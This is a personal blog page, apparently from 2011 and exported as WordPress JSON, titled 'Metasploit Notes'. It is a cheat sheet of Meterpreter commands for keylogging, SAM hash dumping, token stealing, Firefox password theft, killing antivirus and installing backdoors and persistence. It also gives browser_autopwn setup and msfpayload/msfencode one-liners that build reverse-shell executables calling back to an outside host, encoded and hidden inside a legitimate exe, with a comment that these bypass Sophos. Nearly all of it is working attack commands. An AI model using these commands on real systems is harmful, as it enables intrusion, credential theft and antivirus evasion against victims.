{"id":71,"date":"2011-05-20T19:57:25","date_gmt":"2011-05-20T18:57:25","guid":{"rendered":"http:\/\/www.phillips321.co.uk\/?page_id=71"},"modified":"2011-06-07T13:35:35","modified_gmt":"2011-06-07T12:35:35","slug":"metasploit-notes","status":"publish","type":"page","link":"https:\/\/www.phillips321.co.uk\/metasploit-notes\/","title":{"rendered":"Metasploit Notes"},"content":{"rendered":"<h1>Meterpreter<\/h1>\n<p><strong>Process:<\/strong><\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"bash codecolorer\">getuid&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; hows user <span class=\"kw2\">id<\/span><br \/>\ngetpid&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; shows meterpreter process <span class=\"kw2\">id<\/span><br \/>\n<span class=\"kw2\">ps<\/span>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ists running processes<br \/>\nmigrate <span class=\"br0\">&#91;<\/span><span class=\"kw2\">ps<\/span><span class=\"br0\">&#93;<\/span>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; migrates to given process <span class=\"br0\">&#40;<\/span>one that wont end<span class=\"sy0\">\/<\/span>crash<span class=\"br0\">&#41;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><strong>KeyLog: <\/strong>Ensure you are monitoring the correct session (Explorer.exe\/WinLogin.exe)<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"bash codecolorer\">idletime&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; shows how long machine has been idle <span class=\"kw1\">for<\/span><br \/>\nkeyscan_start &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; starts the key logger<br \/>\nkeyscan_dump&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; outputs captured data<br \/>\nkeyscan_stop&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; stops the keylogger<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><strong>Channels: <\/strong>This allows you to do more than one thing at a time in meterpreter<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/><\/div><\/td><td><div class=\"bash codecolorer\">execute <span class=\"re5\">-f<\/span> cmd.exe <span class=\"re5\">-c<\/span> &nbsp; &nbsp; &nbsp; opens a new cmd.exe and creates a new channel <span class=\"kw1\">for<\/span> it<br \/>\nchannel <span class=\"re5\">-l<\/span>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; lists the open channels<br \/>\n<span class=\"kw2\">read<\/span> <span class=\"br0\">&#91;<\/span>channel<span class=\"br0\">&#93;<\/span>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; outputs data from channel<br \/>\ninteract <span class=\"br0\">&#91;<\/span>channel<span class=\"br0\">&#93;<\/span>&nbsp; &nbsp; &nbsp; allows you to jump into the channel<br \/>\n<span class=\"kw2\">write<\/span> <span class=\"br0\">&#91;<\/span>channel<span class=\"br0\">&#93;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; sends data to the channel<br \/>\nclose <span class=\"br0\">&#91;<\/span>channel<span class=\"br0\">&#93;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; kills the channel<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><strong>Session: <\/strong>Session0 is the local desktop. Session1+ are rdp sessions.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"bash codecolorer\">enumdesktops&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; shows currently open desktops such <span class=\"kw2\">as<\/span> winlogin etc<br \/>\ngetdesktop&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; shows current desktop session meterpreter is <span class=\"kw1\">in<\/span><br \/>\nsetdesktop&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; changes to an already open desktop session<br \/>\nuictl disable keyboard&nbsp; &nbsp; &nbsp; disables the keyboard of the desktop session<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><strong>FileEdit: <\/strong>Ability to edit files atributes such as MACE<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"bash codecolorer\">timestomp file.txt <span class=\"re5\">-c<\/span> <span class=\"st0\">&quot;30\/12\/1980 12:12:34&quot;<\/span> changes <span class=\"kw2\">file<\/span> stamp of <span class=\"kw2\">file<\/span><br \/>\ntimestomp file.txt <span class=\"re5\">-f<\/span> sourcefile.txt&nbsp; &nbsp; &nbsp; &nbsp; copys timestamp from sourcefile.txt<br \/>\nuse priv&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; to load the priv extras<br \/>\nhashdump&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; to dump the SAM <span class=\"kw2\">file<\/span> :-<span class=\"br0\">&#41;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><strong>Tokens: <\/strong>Incognito allows token stealing and other token functions<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/><\/div><\/td><td><div class=\"bash codecolorer\">use incognito &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; loads the incognito into meterpreter<br \/>\nlist_tokens <span class=\"re5\">-u<\/span>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; shows stealable tokens<br \/>\nimpersonate_token &nbsp; &nbsp; &nbsp; allows a token to be stolen<br \/>\nsteal_token <span class=\"br0\">&#91;<\/span>psid<span class=\"br0\">&#93;<\/span>&nbsp; &nbsp; &nbsp; allows ability to steal token of a process<br \/>\nrev2self&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; reverts to origional token<br \/>\nrun post<span class=\"sy0\">\/<\/span>windows<span class=\"sy0\">\/<\/span>gather<span class=\"sy0\">\/<\/span>cachedump &nbsp; gets cached domain hashes<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>need to wget http:\/\/lab.mediaservice.net\/code\/cachedump.rb to framework3\/modules\/post\/windows\/gather<\/p>\n<p><strong>Sniffer:<\/strong> Allows promiscuos mode to be enabled \ud83d\ude09<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/><\/div><\/td><td><div class=\"bash codecolorer\">use sniffer &nbsp; &nbsp; &nbsp; &nbsp; loads the sniffer functions<br \/>\nsniffer_interfaces&nbsp; &nbsp; &nbsp; list interface <span class=\"nu0\">1<\/span>,<span class=\"nu0\">2<\/span>,<span class=\"nu0\">3<\/span>,<span class=\"nu0\">4<\/span>,<span class=\"nu0\">5<\/span>,<span class=\"nu0\">6<\/span>,etc<br \/>\nsniffer_start <span class=\"br0\">&#91;<\/span>n<span class=\"br0\">&#93;<\/span> &nbsp; &nbsp; &nbsp; starts the sniffer <span class=\"kw1\">for<\/span> the interface<br \/>\nsniffer_stats <span class=\"br0\">&#91;<\/span>n<span class=\"br0\">&#93;<\/span> &nbsp; &nbsp; &nbsp; lists packets, <span class=\"kw1\">time<\/span>, etc..<br \/>\nsniffer_dump <span class=\"br0\">&#91;<\/span>n<span class=\"br0\">&#93;<\/span> file.pcap&nbsp; dumps the capture locally<br \/>\nsniffer_stop&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; you guessed it ;-<span class=\"br0\">&#41;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><strong>Meterpreter Scripts: <\/strong>These scripts perform various functions on the victim<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/><\/div><\/td><td><div class=\"bash codecolorer\">run checkvm &nbsp; &nbsp; &nbsp; &nbsp; checks <span class=\"kw1\">if<\/span> the target is a vm<br \/>\nrun credscollect&nbsp; &nbsp; &nbsp; &nbsp; dumps hashes and tokens to <span class=\"kw2\">screen<\/span><br \/>\nrun enum_firefox&nbsp; &nbsp; &nbsp; &nbsp; dumps temp internet files from firefox - cookies, passwords, etc :-<span class=\"br0\">&#41;<\/span><br \/>\nrun get_application_list&nbsp; &nbsp; shows installed applications<br \/>\nrun killav&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; trys to stop all known AV progs<br \/>\nrun get_local_subnets &nbsp; &nbsp; &nbsp; enumerates <span class=\"kw3\">local<\/span> subnet info<br \/>\nrun metsvc&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; creates a backdoor<br \/>\nrun persistence &nbsp; &nbsp; &nbsp; &nbsp; survices a reboot <span class=\"br0\">&#40;<\/span>without admin or system<span class=\"br0\">&#41;<\/span><br \/>\nrun schedulme <span class=\"re5\">-e<\/span> file.exe <span class=\"re5\">-m<\/span> <span class=\"nu0\">30<\/span> you<span class=\"st_h\">'ll need to man load the meterpreter.exe payload<br \/>\nrun kitrap0d&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; allows priv escalation using CVE-2010-0232<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<h2>web browser exploit<\/h2>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/><\/div><\/td><td><div class=\"bash codecolorer\">use auxilary<span class=\"sy0\">\/<\/span>server<span class=\"sy0\">\/<\/span>browser_autopwn<br \/>\n<span class=\"kw1\">set<\/span> LHOST <span class=\"br0\">&#91;<\/span>local_ip<span class=\"br0\">&#93;<\/span><br \/>\n<span class=\"kw1\">set<\/span> SRVPORT <span class=\"nu0\">80<\/span><br \/>\n<span class=\"kw1\">set<\/span> URIPATH <span class=\"sy0\">\/<\/span><br \/>\nrun<br \/>\n<span class=\"co0\">#now get the client to connect to you (use ettercap dns)<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<h2>inbuilt sqlite db<\/h2>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/><\/div><\/td><td><div class=\"bash codecolorer\">db_driver sqlite3 \u00a0 \u00a0 \u00a0starts the db using sqlite <span class=\"br0\">&#40;<\/span><span class=\"kw2\">file<\/span> based<span class=\"br0\">&#41;<\/span><br \/>\ndb_connect job \u00a0 \u00a0 \u00a0 creates a new db called job and connects to it<br \/>\ndb_hosts \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0shows hosts<br \/>\ndb_services \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 shows visible services<br \/>\ndb_nmap <span class=\"re5\">-sS<\/span> <span class=\"br0\">&#91;<\/span>target_ip<span class=\"br0\">&#93;<\/span> \u00a0 \u00a0 performs <span class=\"kw2\">nmap<\/span> against target and stores <span class=\"kw1\">in<\/span> db<br \/>\ndn_import_nmap_xml \u00a0 \u00a0 \u00a0 \u00a0allows inport<br \/>\ndb_autopwn <span class=\"re5\">-p<\/span> <span class=\"re5\">-e<\/span> <span class=\"re5\">-r<\/span> <span class=\"re5\">-t<\/span> \u00a0 \u00a0 \u00a0 \u00a0 autoown from db vulns<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<h2>Meterpreter Payload\u00a0Backdoor<\/h2>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/><\/div><\/td><td><div class=\"bash codecolorer\">.<span class=\"sy0\">\/<\/span>msfpayload windows<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>reverse_tcp <span class=\"re2\">LHOST<\/span>=phillipshome.getmyip.com <span class=\"re2\">LPORT<\/span>=<span class=\"nu0\">4444<\/span> X <span class=\"sy0\">&gt;<\/span> clear.exe<br \/>\n.<span class=\"sy0\">\/<\/span>msfpayload windows<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>reverse_tcp <span class=\"re2\">LHOST<\/span>=phillipshome.getmyip.com <span class=\"re2\">LPORT<\/span>=<span class=\"nu0\">4444<\/span> R <span class=\"sy0\">|<\/span> .<span class=\"sy0\">\/<\/span>msfencode <span class=\"re5\">-e<\/span> x86<span class=\"sy0\">\/<\/span>shikata_ga_nai <span class=\"re5\">-c<\/span> <span class=\"nu0\">5<\/span> <span class=\"re5\">-t<\/span> exe <span class=\"re5\">-o<\/span> encoded.exe<br \/>\nsets the payload <span class=\"kw2\">as<\/span> meterpreter and <span class=\"kw1\">then<\/span> encodes it <span class=\"nu0\">5<\/span> <span class=\"kw3\">times<\/span> to bypass AV<br \/>\n.<span class=\"sy0\">\/<\/span>msfpayload windows<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>reverse_tcp <span class=\"re2\">LHOST<\/span>=phillipshome.getmyip.com <span class=\"re2\">LPORT<\/span>=<span class=\"nu0\">4444<\/span> R <span class=\"sy0\">|<\/span> .<span class=\"sy0\">\/<\/span>msfencode <span class=\"re5\">-t<\/span> exe <span class=\"re5\">-x<\/span> <span class=\"sy0\">\/<\/span>mnt<span class=\"sy0\">\/<\/span>hgfs<span class=\"sy0\">\/<\/span>tools<span class=\"sy0\">\/<\/span>exploits<span class=\"sy0\">\/<\/span>spider.exe <span class=\"re5\">-k<\/span> <span class=\"re5\">-o<\/span> <span class=\"sy0\">\/<\/span>share<span class=\"sy0\">\/<\/span>spider.exe <span class=\"re5\">-e<\/span> x86<span class=\"sy0\">\/<\/span>shikata_ga_nai <span class=\"re5\">-c<\/span> <span class=\"nu0\">5<\/span><br \/>\n<span class=\"co0\">#this fucker bypasses sophos :-)<\/span><br \/>\n.<span class=\"sy0\">\/<\/span>msfcli exploit<span class=\"sy0\">\/<\/span>multi<span class=\"sy0\">\/<\/span>handler <span class=\"re2\">PAYLOAD<\/span>=windows<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>reverse_tcp <span class=\"re2\">LHOST<\/span>=192.168.1.120 <span class=\"re2\">LPORT<\/span>=<span class=\"nu0\">4444<\/span> E<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>One Liners<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"co0\"># One liner meterpreter reverse_tcp<\/span><br \/>\n<span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>exploits<span class=\"sy0\">\/<\/span>framework3<span class=\"sy0\">\/<\/span>msfpayload windows<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>reverse_tcp <span class=\"re2\">LHOST<\/span>=<span class=\"sy0\">`<\/span><span class=\"kw2\">ifconfig<\/span> \u00a0<span class=\"sy0\">|<\/span> <span class=\"kw2\">grep<\/span> <span class=\"st_h\">'inet addr:'<\/span><span class=\"sy0\">|<\/span> <span class=\"kw2\">grep<\/span> <span class=\"re5\">-v<\/span> <span class=\"st_h\">'127.0.0.1'<\/span> <span class=\"sy0\">|<\/span> <span class=\"kw2\">cut<\/span> -d: <span class=\"re5\">-f2<\/span> <span class=\"sy0\">|<\/span> <span class=\"kw2\">awk<\/span> <span class=\"st_h\">'{ print $1}'<\/span><span class=\"sy0\">`<\/span> <span class=\"re2\">LPORT<\/span>=<span class=\"nu0\">4444<\/span> X <span class=\"sy0\">&gt;<\/span> <span class=\"sy0\">\/<\/span>root<span class=\"sy0\">\/<\/span>clear.exe<br \/>\n<br \/>\n<span class=\"co0\"># One liner shikata encoded meterpreter reverse_tcp<\/span><br \/>\n<span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>exploits<span class=\"sy0\">\/<\/span>framework3<span class=\"sy0\">\/<\/span>msfpayload windows<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>reverse_tcp <span class=\"re2\">LHOST<\/span>=<span class=\"sy0\">`<\/span><span class=\"kw2\">ifconfig<\/span> \u00a0<span class=\"sy0\">|<\/span> <span class=\"kw2\">grep<\/span> <span class=\"st_h\">'inet addr:'<\/span><span class=\"sy0\">|<\/span> <span class=\"kw2\">grep<\/span> <span class=\"re5\">-v<\/span> <span class=\"st_h\">'127.0.0.1'<\/span> <span class=\"sy0\">|<\/span> <span class=\"kw2\">cut<\/span> -d: <span class=\"re5\">-f2<\/span> <span class=\"sy0\">|<\/span> <span class=\"kw2\">awk<\/span> <span class=\"st_h\">'{ print $1}'<\/span><span class=\"sy0\">`<\/span> <span class=\"re2\">LPORT<\/span>=<span class=\"nu0\">4444<\/span> R <span class=\"sy0\">|<\/span> <span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>exploits<span class=\"sy0\">\/<\/span>framework3<span class=\"sy0\">\/<\/span>msfencode <span class=\"re5\">-e<\/span> x86<span class=\"sy0\">\/<\/span>shikata_ga_nai <span class=\"re5\">-c<\/span> <span class=\"nu0\">5<\/span> <span class=\"re5\">-t<\/span> exe <span class=\"re5\">-o<\/span> <span class=\"sy0\">\/<\/span>root<span class=\"sy0\">\/<\/span>encoded.exe<br \/>\n<br \/>\n<span class=\"co0\"># One liner encoded and hidden in windows exe meterpreter reverse_tcp<\/span><br \/>\n<span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>exploits<span class=\"sy0\">\/<\/span>framework3<span class=\"sy0\">\/<\/span>msfpayload windows<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>reverse_tcp <span class=\"re2\">LHOST<\/span>=<span class=\"sy0\">`<\/span><span class=\"kw2\">ifconfig<\/span> \u00a0<span class=\"sy0\">|<\/span> <span class=\"kw2\">grep<\/span> <span class=\"st_h\">'inet addr:'<\/span><span class=\"sy0\">|<\/span> <span class=\"kw2\">grep<\/span> <span class=\"re5\">-v<\/span> <span class=\"st_h\">'127.0.0.1'<\/span> <span class=\"sy0\">|<\/span> <span class=\"kw2\">cut<\/span> -d: <span class=\"re5\">-f2<\/span> <span class=\"sy0\">|<\/span> <span class=\"kw2\">awk<\/span> <span class=\"st_h\">'{ print $1}'<\/span><span class=\"sy0\">`<\/span> <span class=\"re2\">LPORT<\/span>=<span class=\"nu0\">4444<\/span> R <span class=\"sy0\">|\/<\/span>pentest<span class=\"sy0\">\/<\/span>exploits<span class=\"sy0\">\/<\/span>framework3<span class=\"sy0\">\/<\/span>msfencode <span class=\"re5\">-t<\/span> exe <span class=\"re5\">-x<\/span> <span class=\"sy0\">\/<\/span>mnt<span class=\"sy0\">\/<\/span>hgfs<span class=\"sy0\">\/<\/span>tools<span class=\"sy0\">\/<\/span>exploits<span class=\"sy0\">\/<\/span>spider.exe <span class=\"re5\">-k<\/span> <span class=\"re5\">-o<\/span> <span class=\"sy0\">\/<\/span>root<span class=\"sy0\">\/<\/span>spider.exe <span class=\"re5\">-e<\/span> x86<span class=\"sy0\">\/<\/span>shikata_ga_nai <span class=\"re5\">-c<\/span> <span class=\"nu0\">5<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Meterpreter Process: 1234getuid&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; hows user id getpid&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; shows meterpreter process id ps&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ists running processes migrate &#91;ps&#93;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; migrates to given process &#40;one that wont end\/crash&#41; KeyLog: Ensure you are monitoring the correct [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/pages\/71"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=71"}],"version-history":[{"count":10,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/pages\/71\/revisions"}],"predecessor-version":[{"id":117,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/pages\/71\/revisions\/117"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=71"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}